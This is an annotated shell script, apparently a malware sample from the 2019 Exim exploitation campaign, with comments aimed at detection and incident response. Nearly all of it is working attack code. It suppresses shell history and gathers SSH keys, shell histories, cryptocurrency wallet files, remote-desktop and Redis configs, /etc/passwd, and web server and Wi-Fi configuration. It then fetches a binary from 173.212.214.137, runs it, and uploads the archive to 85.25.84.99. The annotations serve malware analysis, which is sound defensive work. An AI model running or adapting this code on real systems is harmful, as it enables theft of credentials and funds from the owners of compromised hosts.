- #!/bin/sh
- # found in the wild
- # exim exploit 2019-10149
- export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
- export LC_ALL=C
- export HISTFILE=/dev/null
- export HISTSIZE=0
- HOME=/root
- unset DISPLAY
- export UPLOAD_URL=https://85.25.84.99/up.php
- NOLS=0
- NOETC=0
- NODUP=1
- V=2
- UF=temp3754r97y$V
- # Run-once guard: exit with status 100 if the marker file already exists in any of the
- # three staging locations. Detection: a file named $UF in /var/tmp, /tmp or /dev/shm.
- if [ $NODUP -eq 1 ]; then
- test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
- fi
- # Choose the first writable staging directory (/var/tmp, then /tmp, then /dev/shm).
- # Creating the marker doubles as the write test; exit 90 if none is writable.
- BASE=''
- touch /var/tmp/$UF && BASE=/var/tmp
- test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
- test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
- test -z "$BASE" && exit 90
- # Working directory for the collected data is $BASE/r.
- cd $BASE && mkdir r && cd r
- # $BASE is put first in PATH, so a bare command name resolves to a file dropped there
- # before the system binary of the same name.
- export PATH=$BASE:$PATH
- # snd FILE: start `atd` in the background through a child sh, handing it the file to
- # send ($1), the upload name (<hostname>.tbz2) and $UPLOAD_URL as environment variables.
- # What the helper does with them is not visible here; presumably it posts the file.
- # Detection: a process named atd started from a temp directory with UPLOAD_FILE,
- # UPLOAD_NAME and UPLOAD_URL in its environment.
- snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }
- # ok, real work starts here
- main_dir=$BASE/r
- mkdir $main_dir/root/
- # Stage 1: copy root's .ssh directory, shell rc files, shell histories and .dbshell
- # (MongoDB shell history). For responders: treat SSH keys and anything typed into a
- # shell or database client on this host as disclosed.
- COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
- cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null
- # Stage 2: one tar archive (root.tar) of wallet files (w*dat), coin daemon .conf files
- # and *address.txt under root's home, VNC/Redis/rdesktop/Remmina dotfiles, and the same
- # patterns plus .ssh, shell rc files and histories for every user under /home.
- # Missing paths are ignored because stderr is discarded.
- cd $HOME && tar cf $main_dir/root/root.tar \
- .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
- *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
- /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
- /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
- /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
- cd $main_dir/root/
- # Redirect `ssh -V` stdout into ssh.version.
- ssh -V > ssh.version 2>/dev/null
- # With NOLS=0: listings of /home and of each user's home go to `homes`; the third
- # command is spelled `la` in the sample and its output is redirected to `rootls`.
- if [ $NOLS -eq 0 ]; then
- ls -la /home/ > homes 2>/dev/null
- ls -la /home/*/ >> homes 2>/dev/null
- la -laR /root > rootls 2>/dev/null
- fi
- mkdir $main_dir/root/sysinfo 2>/dev/null
- cd $main_dir/root/sysinfo 2>/dev/null
- # EXIM
- tail -n 100 /etc/*release /etc/version > system.version 2>/dev/null
- ip addr > ip 2>/dev/null
- iptables-save > iptables 2>/dev/null
- ip6tables-save > ip6tables 2>/dev/null
- # /EXIM end exim
- hostname > hostname
- uname -a > uname
- echo `date -u` '('`$(which date)`')' > date
- uptime > uptime
- w > w
- id > id
- ps auxwwwwwTH > ps
- ps auxwwwwwf > ps-forest
- ps auxwwwwwfe > ps-env
- cat /proc/meminfo > meminfo 2>/dev/null
- cat /proc/cpuinfo > cpuinfo 2>/dev/null
- ifconfig -a > ifconfig 2>/dev/null
- df > df 2>/dev/null
- dmesg > dmesg 2>/dev/null
- mount > mount 2>/dev/null
- env > env 2>/dev/null
- lspci -k > lspci 2>/dev/null
- lsusb > lsusb 2>/dev/null
- netstat -antpuxwenW > netstat 2>/dev/null
- route -en > route 2>/dev/null
- # other kernel info
- cat /proc/modules > lsmod 2>/dev/null
- cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
- lscpu > lscpu 2>/dev/null
- # copy stuff from /etc?
- # With NOETC=0: copy release/version files, cron configuration, hosts files, motd,
- # /etc/passwd, the apache2/httpd/nginx trees, resolver config and /etc/wpa*.
- # -L follows symlinks, so link targets are copied as real files. For responders: web
- # server trees may hold TLS keys or credentials and wpa* may hold Wi-Fi keys; verify
- # what those paths contained on the affected host.
- if [ $NOETC -eq 0 ]; then
- mkdir $main_dir/root/sysinfo/etc
- cd $main_dir/root/sysinfo/etc
- cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
- cd -
- fi
- cd $main_dir/root
- # list some dirs
- # With NOLS=0: recursive listings of /boot and /etc, errors included in the output files.
- if [ $NOLS -eq 0 ]; then
- ls -laR /boot > ls-boot 2>&1
- ls -laR /etc > ls-etc 2>&1
- fi
- # compress n clean up
- cd $main_dir
- tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
- # drop source files
- rm -rf $main_dir &
- # ready to send!
- cd $BASE
- wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
- test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf